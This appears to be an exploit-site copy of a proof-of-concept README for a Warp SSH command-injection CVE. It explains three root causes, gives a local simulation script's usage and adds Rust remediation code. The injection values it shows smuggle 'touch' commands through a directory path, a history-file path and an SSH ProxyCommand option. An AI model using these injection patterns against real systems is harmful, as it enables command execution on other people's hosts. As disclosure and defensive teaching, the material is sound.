## https://sploitus.com/exploit?id=29D0989A-B7ED-56AD-B27C-E3D705F08F97
# CVE-2026-54686: Warp Remote SSH Command Injection PoC

## Description

This repository contains a Proof of Concept (PoC) for **CVE-2026-54686**, a command injection issue in **Warp** remote SSH session helper command handling.

Affected code paths used values learned from a remote SSH session when constructing shell commands or local SSH command lines. If those values contain shell metacharacters or injected SSH options, an attacker-controlled remote host can influence Warp background commands and cause unintended command execution.

This PoC is a safe local simulation. It does not connect to Warp or to any SSH server. It reproduces the vulnerable string construction patterns and uses marker files under `/tmp` to show whether the injected command would execute.

**Discovered by: saku0512** ([GitHub](https://github.com/Saku0512))

## Disclaimer

This project is for educational and ethical security testing purposes only.

The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.

## Vulnerability Details

- **CVE ID**: CVE-2026-54686
- **Type**: OS Command Injection / SSH Option Injection
- **Weakness**: CWE-78
- **Impact**: Remote command execution on the connected SSH host and potential local command execution through injected SSH options
- **Affected Component**:
  - `RemoteCommandExecutor`
  - SSH session history processing
  - SSH transport control socket handling

## Root Cause

### 1. Remote cwd command injection

The remote current working directory was placed inside single quotes without escaping embedded single quote characters:

```rust
command_str.push_str(&format!("cd '{current_directory_path}' && "));
```

If `current_directory_path` contains a value such as:

```text
/tmp/warp-cve-2026-54686'; touch /tmp/warp_cve_2026_54686_cwd_confirmed; echo '
```

the generated helper command becomes:

```bash
cd '/tmp/warp-cve-2026-54686'; touch /tmp/warp_cve_2026_54686_cwd_confirmed; echo '' && pwd
```

The injected `touch` command is interpreted by the shell as a separate command.

### 2. Remote history file command injection

The remote history file path was interpolated into a shell command without quoting:

```rust
format!("cat {history_file}")
```

If `history_file` contains shell syntax such as:

```text
/tmp/history; touch /tmp/warp_cve_2026_54686_history_confirmed; #
```

the generated command runs the injected command after `cat`.

### 3. SSH option injection through ControlPath

The SSH control socket path was used to build an SSH option:

```rust
format!("ControlPath={}", socket_path.display())
```

If this value is later used in an unsafe command-line construction path, a value such as:

```text
/tmp/socket -o ProxyCommand='touch /tmp/warp_cve_2026_54686_ssh_option_confirmed'
```

can introduce an additional SSH option. This PoC models that unsafe tokenization locally with a fake SSH parser and does not invoke the real `ssh` binary.

## Proof of Concept (Usage)

### 1. Environment Setup

Ensure you have Python 3 installed:

```bash
python3 --version
```

### 2. Run All Vulnerable Simulations

```bash
python3 poc.py
```

Expected output includes success messages for the marker files:

```text
[!] SUCCESS: /tmp/warp_cve_2026_54686_cwd_confirmed was created.
[!] SUCCESS: /tmp/warp_cve_2026_54686_history_confirmed was created.
[!] SUCCESS: /tmp/warp_cve_2026_54686_ssh_option_confirmed was created.
```

### 3. Run Individual Cases

Remote cwd injection:

```bash
python3 poc.py --case cwd
```

Remote history file injection:

```bash
python3 poc.py --case history
```

SSH option injection simulation:

```bash
python3 poc.py --case ssh-option
```

### 4. Patched Behavior Simulation

Run the fixed builders:

```bash
python3 poc.py --mode fixed
```

The fixed simulation quotes or escapes attacker-controlled values, so the marker files should not be created.

## Verification

Check for marker files after running the vulnerable simulation:

```bash
ls -l /tmp/warp_cve_2026_54686_*_confirmed
```

Clean up marker files:

```bash
rm -f /tmp/warp_cve_2026_54686_*_confirmed
```

## Remediation

Use structured argument APIs where possible and avoid constructing shell commands from remote-controlled strings.

When a shell command is unavoidable, quote each untrusted value for the exact shell context where it will be used. For single-quoted POSIX shell strings, escape embedded single quotes before interpolation. For paths passed to local SSH options, validate them as paths and keep each option as a single structured argument instead of rebuilding a shell command string.
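
The quoting and structured-argument advice above, applied to the three patterns from the Root Cause section, as an added Rust example (it is not Warp's actual patch and not part of this repository's `poc.py`). The function names, the `decode_one_word` check helper and the control-socket validation policy are assumptions made for illustration.

```rust
use std::ffi::OsString;
use std::path::Path;

/// Quote `value` as exactly one POSIX shell word: wrap it in single quotes and
/// rewrite each embedded ' as '\'' (close quote, escaped quote, reopen quote).
fn sh_single_quote(value: &str) -> String {
    format!("'{}'", value.replace('\'', "'\\''"))
}

/// Hardened form of the page's `cd '{current_directory_path}' && ` prefix.
fn cd_prefix(cwd: &str) -> String {
    format!("cd {} && ", sh_single_quote(cwd))
}

/// Hardened form of the page's `cat {history_file}`; `--` ends option parsing.
fn cat_history(history_file: &str) -> String {
    format!("cat -- {}", sh_single_quote(history_file))
}

/// Check helper: decode `word` as a shell would (single quotes, backslash).
/// None means some character sits outside the quoting and could be interpreted.
fn decode_one_word(word: &str) -> Option<String> {
    let (mut out, mut quoted) = (String::new(), false);
    let mut chars = word.chars();
    while let Some(c) = chars.next() {
        match (quoted, c) {
            (_, '\'') => quoted = !quoted,
            (true, _) => out.push(c),
            (false, '\\') => out.push(chars.next()?),
            (false, _) => return None,
        }
    }
    if quoted { None } else { Some(out) }
}

/// ssh argv entries for the control socket; no shell string is rebuilt.
/// Assumed policy: absolute path, no whitespace or control characters.
fn control_path_args(socket: &Path) -> Result<Vec<OsString>, String> {
    let text = socket.to_str().ok_or("socket path is not valid UTF-8")?;
    if !socket.is_absolute() || text.chars().any(|c| c.is_whitespace() || c.is_control()) {
        return Err(format!("rejected control socket path: {text:?}"));
    }
    Ok(vec![OsString::from("-o"), OsString::from(format!("ControlPath={text}"))])
}

fn main() {
    let cwd = "/tmp/warp-cve-2026-54686'; touch /tmp/warp_cve_2026_54686_cwd_confirmed; echo '";
    println!("{}pwd", cd_prefix(cwd));
    println!("{:?}", control_path_args(Path::new("/tmp/socket")));
}
```

With the page's cwd value, `decode_one_word` returns the original string for the quoted form and `None` for the unescaped `'{cwd}'` form, which is the difference between one `cd` argument and three separate commands.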

## References

- [Warp GitHub](https://github.com/warpdotdev/warp)
- [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html)